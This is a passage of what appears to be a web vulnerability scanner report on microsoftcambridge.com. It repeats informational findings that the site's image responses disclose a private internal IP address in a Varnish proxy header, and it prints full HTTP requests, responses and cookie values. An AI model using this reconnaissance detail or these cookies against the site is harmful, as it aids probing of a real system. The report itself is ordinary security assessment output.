Cookie: X-Mapping-nbhajkek=E6E5D631524F4DD8BB7534BAE903B96B; .ASPXANONYMOUS=OFrsmOghzAEkAAAAOTFmZjU1MzEtY2E0OS00OWM1LThjMzctZGM1OGE0ODRiZDI40; X-Mapping-pfddgonl=410A14DAAD5DF3986EEC751A415912F9; language=en-US

Response

HTTP/1.1 200 OK
Server: Apache/2.2
Content-Type: image/png
Last-Modified: Thu, 02 Sep 2010 18:50:36 GMT
Content-Length: 2010
Date: Sat, 26 Mar 2011 01:42:34 GMT
X-Varnish: 1939098931
Age: 0
Connection: keep-alive
Via: 1.1 varnish 172.17.3.23
X-Cache: MISS

.PNG
.
...IHDR...F...(.............tEXtSoftware.Adobe ImageReadyq.e<...|IDATx..YkP.U.>........    ......\4.".%....r...t...5...~.....i.GM......X..N..@.R......,,....sz.]...eY....o...=....<...pf..........
...[SNIP]...
24.15. http://microsoftcambridge.com/Portals/0/events/arduino_thum.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://microsoftcambridge.com
Path:   /Portals/0/events/arduino_thum.png

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /Portals/0/events/arduino_thum.png HTTP/1.1
Host: microsoftcambridge.com
Proxy-Connection: keep-alive
Referer: http://microsoftcambridge.com/Events/tabid/57/Default.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-nbhajkek=E6E5D631524F4DD8BB7534BAE903B96B; .ASPXANONYMOUS=OFrsmOghzAEkAAAAOTFmZjU1MzEtY2E0OS00OWM1LThjMzctZGM1OGE0ODRiZDI40; X-Mapping-pfddgonl=410A14DAAD5DF3986EEC751A415912F9; language=en-US

Response

HTTP/1.1 200 OK
Server: Apache/2.2
Content-Type: image/png
Last-Modified: Fri, 18 Feb 2011 15:58:52 GMT
Content-Length: 3751
Date: Sat, 26 Mar 2011 01:42:37 GMT
X-Varnish: 1939099717
Age: 0
Connection: keep-alive
Via: 1.1 varnish 172.17.3.23
X-Cache: MISS

.PNG
.
...IHDR...F...(.............tEXtSoftware.Adobe ImageReadyq.e<...IIDATx..Yy.......t..........S.*.(.xTH...I..Q.(.5..Ib...<..M%.2bILH!..eP.B...@...B.Y.v..eawv....^.wt....V._.<........~....54..|.
...[SNIP]...
24.16. http://microsoftcambridge.com/Portals/0/events/barcamp_thum.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://microsoftcambridge.com
Path:   /Portals/0/events/barcamp_thum.png

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /Portals/0/events/barcamp_thum.png HTTP/1.1
Host: microsoftcambridge.com
Proxy-Connection: keep-alive
Referer: http://microsoftcambridge.com/Events/tabid/57/Default.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-nbhajkek=E6E5D631524F4DD8BB7534BAE903B96B; .ASPXANONYMOUS=OFrsmOghzAEkAAAAOTFmZjU1MzEtY2E0OS00OWM1LThjMzctZGM1OGE0ODRiZDI40; X-Mapping-pfddgonl=410A14DAAD5DF3986EEC751A415912F9; language=en-US

Response

HTTP/1.1 200 OK
Server: Apache/2.2
Content-Type: image/png
Last-Modified: Mon, 22 Nov 2010 22:14:19 GMT
Content-Length: 1997
Date: Sat, 26 Mar 2011 01:42:35 GMT
X-Varnish: 1939099021
Age: 0
Connection: keep-alive
Via: 1.1 varnish 172.17.3.23
X-Cache: MISS

.PNG
.
...IHDR...F...(.............tEXtSoftware.Adobe ImageReadyq.e<...oIDATx..Y[LTW......0<*2.<j......Q..Q...H....4......I..X..b.........)...+....."2.*.. .y80...r.H./.bF..p..33{....{....#hq...p..
...[SNIP]...
24.17. http://microsoftcambridge.com/Portals/0/events/bazure_thum.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://microsoftcambridge.com
Path:   /Portals/0/events/bazure_thum.png

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /Portals/0/events/bazure_thum.png HTTP/1.1
Host: microsoftcambridge.com
Proxy-Connection: keep-alive
Referer: http://microsoftcambridge.com/Events/tabid/57/Default.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-nbhajkek=E6E5D631524F4DD8BB7534BAE903B96B; .ASPXANONYMOUS=OFrsmOghzAEkAAAAOTFmZjU1MzEtY2E0OS00OWM1LThjMzctZGM1OGE0ODRiZDI40; X-Mapping-pfddgonl=410A14DAAD5DF3986EEC751A415912F9; language=en-US

Response

HTTP/1.1 200 OK
Server: Apache/2.2
Content-Type: image/png
Last-Modified: Wed, 21 Oct 2009 19:07:38 GMT
Content-Length: 4521
Date: Sat, 26 Mar 2011 01:42:33 GMT
X-Varnish: 1939098513
Age: 0
Connection: keep-alive
Via: 1.1 varnish 172.17.3.23
X-Cache: MISS

.PNG
.
...IHDR...F...(.............tEXtSoftware.Adobe ImageReadyq.e<...KIDATx..9i....w.........N.,...p..c0...f.H.Q.=......(.81.8..1Qv=l    .f..eXd. Kw.4........wo..[p8.kN....u..{.}/<h.....!....9....
...[SNIP]...
24.18. http://microsoftcambridge.com/Portals/0/events/blogbrown_thum.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://microsoftcambridge.com
Path:   /Portals/0/events/blogbrown_thum.png

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /Portals/0/events/blogbrown_thum.png HTTP/1.1
Host: microsoftcambridge.com
Proxy-Connection: keep-alive
Referer: http://microsoftcambridge.com/Events/tabid/57/Default.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-nbhajkek=E6E5D631524F4DD8BB7534BAE903B96B; .ASPXANONYMOUS=OFrsmOghzAEkAAAAOTFmZjU1MzEtY2E0OS00OWM1LThjMzctZGM1OGE0ODRiZDI40; X-Mapping-pfddgonl=410A14DAAD5DF3986EEC751A415912F9; language=en-US

Response

HTTP/1.1 200 OK
Server: Apache/2.2
Content-Type: image/png
Last-Modified: Fri, 25 Mar 2011 14:18:59 GMT
Content-Length: 3307
Date: Sat, 26 Mar 2011 01:42:36 GMT
X-Varnish: 1939099399
Age: 0
Connection: keep-alive
Via: 1.1 varnish 172.17.3.23
X-Cache: MISS

.PNG
.
...IHDR...F...(.............tEXtSoftware.Adobe ImageReadyq.e<...kiTXtXML:com.adobe.xmp.....<?xpacket begin="..." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="A
...[SNIP]...
24.19. http://microsoftcambridge.com/Portals/0/events/boomwriter_thum.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://microsoftcambridge.com
Path:   /Portals/0/events/boomwriter_thum.png

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /Portals/0/events/boomwriter_thum.png HTTP/1.1
Host: microsoftcambridge.com
Proxy-Connection: keep-alive
Referer: http://microsoftcambridge.com/Events/tabid/57/Default.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-nbhajkek=E6E5D631524F4DD8BB7534BAE903B96B; .ASPXANONYMOUS=OFrsmOghzAEkAAAAOTFmZjU1MzEtY2E0OS00OWM1LThjMzctZGM1OGE0ODRiZDI40; X-Mapping-pfddgonl=410A14DAAD5DF3986EEC751A415912F9; language=en-US

Response

HTTP/1.1 200 OK
Server: Apache/2.2
Content-Type: image/png
Last-Modified: Thu, 24 Mar 2011 22:53:49 GMT
Content-Length: 5545
Date: Sat, 26 Mar 2011 01:42:37 GMT
X-Varnish: 1939099716
Age: 0
Connection: keep-alive
Via: 1.1 varnish 172.17.3.23
X-Cache: MISS

.PNG
.
...IHDR...F...(.............tEXtSoftware.Adobe ImageReadyq.e<...kiTXtXML:com.adobe.xmp.....<?xpacket begin="..." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="A
...[SNIP]...
24.20. http://microsoftcambridge.com/Portals/0/events/boston-area-sharepoint_thum.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://microsoftcambridge.com
Path:   /Portals/0/events/boston-area-sharepoint_thum.png

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /Portals/0/events/boston-area-sharepoint_thum.png HTTP/1.1
Host: microsoftcambridge.com
Proxy-Connection: keep-alive
Referer: http://microsoftcambridge.com/Events/tabid/57/Default.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-nbhajkek=E6E5D631524F4DD8BB7534BAE903B96B; .ASPXANONYMOUS=OFrsmOghzAEkAAAAOTFmZjU1MzEtY2E0OS00OWM1LThjMzctZGM1OGE0ODRiZDI40; X-Mapping-pfddgonl=410A14DAAD5DF3986EEC751A415912F9; language=en-US

Response

HTTP/1.1 200 OK
Server: Apache/2.2
Content-Type: image/png
Last-Modified: Thu, 04 Nov 2010 14:30:59 GMT
Content-Length: 3508
Date: Sat, 26 Mar 2011 01:42:35 GMT
X-Varnish: 1939099288
Age: 0
Connection: keep-alive
Via: 1.1 varnish 172.17.3.23
X-Cache: MISS

.PNG
.
...IHDR...F...(.............tEXtSoftware.Adobe ImageReadyq.e<..VIDATx..YiW.gz.o..]..t.-Va...#[.d...gf.....K.H.P~G.$v,....0Z.b.k.^......<O.$d[.r4......JEU.{..>.....Y.m.
......{.....2./......4
...[SNIP]...
24.21. http://microsoftcambridge.com/Portals/0/events/bostonWordpressMeetup_thum.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://microsoftcambridge.com
Path:   /Portals/0/events/bostonWordpressMeetup_thum.png

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /Portals/0/events/bostonWordpressMeetup_thum.png HTTP/1.1
Host: microsoftcambridge.com
Proxy-Connection: keep-alive
Referer: http://microsoftcambridge.com/Events/tabid/57/Default.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-nbhajkek=E6E5D631524F4DD8BB7534BAE903B96B; .ASPXANONYMOUS=OFrsmOghzAEkAAAAOTFmZjU1MzEtY2E0OS00OWM1LThjMzctZGM1OGE0ODRiZDI40; X-Mapping-pfddgonl=410A14DAAD5DF3986EEC751A415912F9; language=en-US

Response

HTTP/1.1 200 OK
Server: Apache/2.2
Content-Type: image/png
Last-Modified: Thu, 13 Jan 2011 21:20:58 GMT
Content-Length: 1999
Date: Sat, 26 Mar 2011 01:42:32 GMT
X-Varnish: 1939098024
Age: 0
Connection: keep-alive
Via: 1.1 varnish 172.17.3.23
X-Cache: MISS

.PNG
.
...IHDR...F...(.............tEXtSoftware.Adobe ImageReadyq.e<...qIDATx...kL.}....)J..HDR..BT..*+..j.a.b..`k.5....f.E^.....N+*..P..3.rH.D.y>\..{...............u.....{}..6.....^k..a.,....z.?...
...[SNIP]...
24.22. http://microsoftcambridge.com/Portals/0/events/bostonphp_thum.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://microsoftcambridge.com
Path:   /Portals/0/events/bostonphp_thum.png

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /Portals/0/events/bostonphp_thum.png HTTP/1.1
Host: microsoftcambridge.com
Proxy-Connection: keep-alive
Referer: http://microsoftcambridge.com/Events/tabid/57/Default.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-nbhajkek=E6E5D631524F4DD8BB7534BAE903B96B; .ASPXANONYMOUS=OFrsmOghzAEkAAAAOTFmZjU1MzEtY2E0OS00OWM1LThjMzctZGM1OGE0ODRiZDI40; X-Mapping-pfddgonl=410A14DAAD5DF3986EEC751A415912F9; language=en-US

Response

HTTP/1.1 200 OK
Server: Apache/2.2
Content-Type: image/png
Last-Modified: Thu, 02 Sep 2010 18:48:47 GMT
Content-Length: 3659
Date: Sat, 26 Mar 2011 01:42:37 GMT
X-Varnish: 1939099712
Age: 0
Connection: keep-alive
Via: 1.1 varnish 172.17.3.23
X-Cache: MISS

.PNG
.
...IHDR...F...(.............tEXtSoftware.Adobe ImageReadyq.e<...IDATx...    xM.....y..$..!#A.\..5S5...Z......R..yjMUC.BU(!2.(DB...H".y...{..&Bu..{}o..}.9g...............5$....    "#....xz..R....
...[SNIP]...
24.23. http://microsoftcambridge.com/Portals/0/events/bug_thum.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://microsoftcambridge.com
Path:   /Portals/0/events/bug_thum.png

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /Portals/0/events/bug_thum.png HTTP/1.1
Host: microsoftcambridge.com
Proxy-Connection: keep-alive
Referer: http://microsoftcambridge.com/Events/tabid/57/Default.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-nbhajkek=E6E5D631524F4DD8BB7534BAE903B96B; .ASPXANONYMOUS=OFrsmOghzAEkAAAAOTFmZjU1MzEtY2E0OS00OWM1LThjMzctZGM1OGE0ODRiZDI40; X-Mapping-pfddgonl=410A14DAAD5DF3986EEC751A415912F9; language=en-US

Response

HTTP/1.1 200 OK
Server: Apache/2.2
Content-Type: image/png
Last-Modified: Thu, 17 Jun 2010 16:38:42 GMT
Content-Length: 2177
Date: Sat, 26 Mar 2011 01:42:38 GMT
X-Varnish: 1939100012
Age: 0
Connection: keep-alive
Via: 1.1 varnish 172.17.3.23
X-Cache: MISS

.PNG
.
...IHDR...F...(.............tEXtSoftware.Adobe ImageReadyq.e<...#IDATx..YiLTY...PU..Bid.....%ch.&.f4Nl..........u&....Q...q\0...0....QP.%...".F..0..VE-.^.o>.%5..v7.....(..u..........NH....#..
...[SNIP]...
24.24. http://microsoftcambridge.com/Portals/0/events/byhp_thum.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://microsoftcambridge.com
Path:   /Portals/0/events/byhp_thum.png

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /Portals/0/events/byhp_thum.png HTTP/1.1
Host: microsoftcambridge.com
Proxy-Connection: keep-alive
Referer: http://microsoftcambridge.com/Events/tabid/57/Default.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-nbhajkek=E6E5D631524F4DD8BB7534BAE903B96B; .ASPXANONYMOUS=OFrsmOghzAEkAAAAOTFmZjU1MzEtY2E0OS00OWM1LThjMzctZGM1OGE0ODRiZDI40; X-Mapping-pfddgonl=410A14DAAD5DF3986EEC751A415912F9; language=en-US

Response

HTTP/1.1 200 OK
Server: Apache/2.2
Content-Type: image/png
Last-Modified: Fri, 25 Mar 2011 21:32:21 GMT
Content-Length: 3361
Date: Sat, 26 Mar 2011 01:42:37 GMT
X-Varnish: 1939099769
Age: 0
Connection: keep-alive
Via: 1.1 varnish 172.17.3.23
X-Cache: MISS

.PNG
.
...IHDR...F...(.............tEXtSoftware.Adobe ImageReadyq.e<...kiTXtXML:com.adobe.xmp.....<?xpacket begin="..." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="A
...[SNIP]...
24.25. http://microsoftcambridge.com/Portals/0/events/dotnetnuke_thum.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://microsoftcambridge.com
Path:   /Portals/0/events/dotnetnuke_thum.png

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /Portals/0/events/dotnetnuke_thum.png HTTP/1.1
Host: microsoftcambridge.com
Proxy-Connection: keep-alive
Referer: http://microsoftcambridge.com/Events/tabid/57/Default.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-nbhajkek=E6E5D631524F4DD8BB7534BAE903B96B; .ASPXANONYMOUS=OFrsmOghzAEkAAAAOTFmZjU1MzEtY2E0OS00OWM1LThjMzctZGM1OGE0ODRiZDI40; X-Mapping-pfddgonl=410A14DAAD5DF3986EEC751A415912F9; language=en-US

Response

HTTP/1.1 200 OK
Server: Apache/2.2
Content-Type: image/png
Last-Modified: Thu, 28 Oct 2010 21:11:36 GMT
Content-Length: 3046
Date: Sat, 26 Mar 2011 01:42:35 GMT
X-Varnish: 1939099285
Age: 0
Connection: keep-alive
Via: 1.1 varnish 172.17.3.23
X-Cache: MISS

.PNG
.
...IHDR...F...(.............tEXtSoftware.Adobe ImageReadyq.e<....IDATx..Y{l[....k....I..I.4!Em.."...U].u.I[)He.b0....6...DiY...$..Im5*.e..........ZB.4u....I.._..}.w.Q.U`u..4.#...=...;.....wL
...[SNIP]...
24.26. http://microsoftcambridge.com/Portals/0/events/easterSealsMA_thum.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://microsoftcambridge.com
Path:   /Portals/0/events/easterSealsMA_thum.png

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /Portals/0/events/easterSealsMA_thum.png HTTP/1.1
Host: microsoftcambridge.com
Proxy-Connection: keep-alive
Referer: http://microsoftcambridge.com/Events/tabid/57/Default.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-nbhajkek=E6E5D631524F4DD8BB7534BAE903B96B; .ASPXANONYMOUS=OFrsmOghzAEkAAAAOTFmZjU1MzEtY2E0OS00OWM1LThjMzctZGM1OGE0ODRiZDI40; X-Mapping-pfddgonl=410A14DAAD5DF3986EEC751A415912F9; language=en-US

Response

HTTP/1.1 200 OK
Server: Apache/2.2
Content-Type: image/png
Last-Modified: Wed, 02 Mar 2011 14:29:45 GMT
Content-Length: 6692
Date: Sat, 26 Mar 2011 01:42:33 GMT
X-Varnish: 1939098470
Age: 0
Connection: keep-alive
Via: 1.1 varnish 172.17.3.23
X-Cache: MISS

.PNG
.
...IHDR...F...(.............tEXtSoftware.Adobe ImageReadyq.e<...kiTXtXML:com.adobe.xmp.....<?xpacket begin="..." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="A
...[SNIP]...
24.27. http://microsoftcambridge.com/Portals/0/events/eventarchive.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://microsoftcambridge.com
Path:   /Portals/0/events/eventarchive.png

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /Portals/0/events/eventarchive.png HTTP/1.1
Host: microsoftcambridge.com
Proxy-Connection: keep-alive
Referer: http://microsoftcambridge.com/Events/tabid/57/Default.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-nbhajkek=E6E5D631524F4DD8BB7534BAE903B96B; .ASPXANONYMOUS=OFrsmOghzAEkAAAAOTFmZjU1MzEtY2E0OS00OWM1LThjMzctZGM1OGE0ODRiZDI40; X-Mapping-pfddgonl=410A14DAAD5DF3986EEC751A415912F9; language=en-US

Response

HTTP/1.1 200 OK
Server: Apache/2.2
Content-Type: image/png
Last-Modified: Wed, 17 Jun 2009 16:22:41 GMT
Content-Length: 4552
Date: Sat, 26 Mar 2011 01:42:31 GMT
X-Varnish: 1939097709
Age: 0
Connection: keep-alive
Via: 1.1 varnish 172.17.3.23
X-Cache: MISS

.PNG
.
...IHDR...,...%........    ....tEXtSoftware.Adobe ImageReadyq.e<..
.iTXtXML:com.adobe.xmp.....<?xpacket begin="..." id="W5M0MpCehiHzreSzNTczkc9d"?>
<x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="A
...[SNIP]...
24.28. http://microsoftcambridge.com/Portals/0/events/events_title.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://microsoftcambridge.com
Path:   /Portals/0/events/events_title.png

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /Portals/0/events/events_title.png HTTP/1.1
Host: microsoftcambridge.com
Proxy-Connection: keep-alive
Referer: http://microsoftcambridge.com/Events/tabid/57/Default.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-nbhajkek=E6E5D631524F4DD8BB7534BAE903B96B; .ASPXANONYMOUS=OFrsmOghzAEkAAAAOTFmZjU1MzEtY2E0OS00OWM1LThjMzctZGM1OGE0ODRiZDI40; X-Mapping-pfddgonl=410A14DAAD5DF3986EEC751A415912F9; language=en-US

Response

HTTP/1.1 200 OK
Server: Apache/2.2
Content-Type: image/png
Last-Modified: Thu, 12 Feb 2009 04:29:44 GMT
Content-Length: 6358
Date: Sat, 26 Mar 2011 01:42:31 GMT
X-Varnish: 1939097613
Age: 0
Connection: keep-alive
Via: 1.1 varnish 172.17.3.23
X-Cache: MISS

.PNG
.
...IHDR.......!.......9.....tEXtSoftware.Adobe ImageReadyq.e<..
.iTXtXML:com.adobe.xmp.....<?xpacket begin="..." id="W5M0MpCehiHzreSzNTczkc9d"?>
<x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="A
...[SNIP]...
24.29. http://microsoftcambridge.com/Portals/0/events/fluidicmems_thum.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://microsoftcambridge.com
Path:   /Portals/0/events/fluidicmems_thum.png

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /Portals/0/events/fluidicmems_thum.png HTTP/1.1
Host: microsoftcambridge.com
Proxy-Connection: keep-alive
Referer: http://microsoftcambridge.com/Events/tabid/57/Default.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-nbhajkek=E6E5D631524F4DD8BB7534BAE903B96B; .ASPXANONYMOUS=OFrsmOghzAEkAAAAOTFmZjU1MzEtY2E0OS00OWM1LThjMzctZGM1OGE0ODRiZDI40; X-Mapping-pfddgonl=410A14DAAD5DF3986EEC751A415912F9; language=en-US

Response

HTTP/1.1 200 OK
Server: Apache/2.2
Content-Type: image/png
Last-Modified: Fri, 04 Jun 2010 19:36:52 GMT
Content-Length: 1706
Date: Sat, 26 Mar 2011 01:42:38 GMT
X-Varnish: 1939100048
Age: 0
Connection: keep-alive
Via: 1.1 varnish 172.17.3.23
X-Cache: MISS

.PNG
.
...IHDR...F...(.............tEXtSoftware.Adobe ImageReadyq.e<...LIDATx..Y.SSW..[..,(.B ..(...(.,...R....Q..km.V;...e......h?T.hk..;.T-."......H.q! ..@....V...-..dnn.9...;..w......"T2..w}.....
...[SNIP]...
24.30. http://microsoftcambridge.com/Portals/0/events/kogent_thum.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://microsoftcambridge.com
Path:   /Portals/0/events/kogent_thum.png

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /Portals/0/events/kogent_thum.png HTTP/1.1
Host: microsoftcambridge.com
Proxy-Connection: keep-alive
Referer: http://microsoftcambridge.com/Events/tabid/57/Default.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-nbhajkek=E6E5D631524F4DD8BB7534BAE903B96B; .ASPXANONYMOUS=OFrsmOghzAEkAAAAOTFmZjU1MzEtY2E0OS00OWM1LThjMzctZGM1OGE0ODRiZDI40; X-Mapping-pfddgonl=410A14DAAD5DF3986EEC751A415912F9; language=en-US

Response

HTTP/1.1 200 OK
Server: Apache/2.2
Content-Type: image/png
Last-Modified: Thu, 24 Mar 2011 22:08:13 GMT
Content-Length: 2582
Date: Sat, 26 Mar 2011 01:42:37 GMT
X-Varnish: 1939099714
Age: 0
Connection: keep-alive
Via: 1.1 varnish 172.17.3.23
X-Cache: MISS

.PNG
.
...IHDR...F...(.............tEXtSoftware.Adobe ImageReadyq.e<...kiTXtXML:com.adobe.xmp.....<?xpacket begin="..." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="A
...[SNIP]...
24.31. http://microsoftcambridge.com/Portals/0/events/masschallenge_thum.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://microsoftcambridge.com
Path:   /Portals/0/events/masschallenge_thum.png

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /Portals/0/events/masschallenge_thum.png HTTP/1.1
Host: microsoftcambridge.com
Proxy-Connection: keep-alive
Referer: http://microsoftcambridge.com/Events/tabid/57/Default.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-nbhajkek=E6E5D631524F4DD8BB7534BAE903B96B; .ASPXANONYMOUS=OFrsmOghzAEkAAAAOTFmZjU1MzEtY2E0OS00OWM1LThjMzctZGM1OGE0ODRiZDI40; X-Mapping-pfddgonl=410A14DAAD5DF3986EEC751A415912F9; language=en-US

Response

HTTP/1.1 200 OK
Server: Apache/2.2
Content-Type: image/png
Last-Modified: Fri, 07 May 2010 21:47:23 GMT
Content-Length: 3867
Date: Sat, 26 Mar 2011 01:42:34 GMT
X-Varnish: 1939098945
Age: 0
Connection: keep-alive
Via: 1.1 varnish 172.17.3.23
X-Cache: MISS

.PNG
.
...IHDR...F...(.............tEXtSoftware.Adobe ImageReadyq.e<....IDATx..Yis..y>.......j.!...!D .......3..?$T.J\5..cR._p.*..8.'&0&.3..0.......$...n...<..tadW...*....{...>.}..yO......iF...W_.o
...[SNIP]...
24.32. http://microsoftcambridge.com/Portals/0/events/michiganross_thum.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
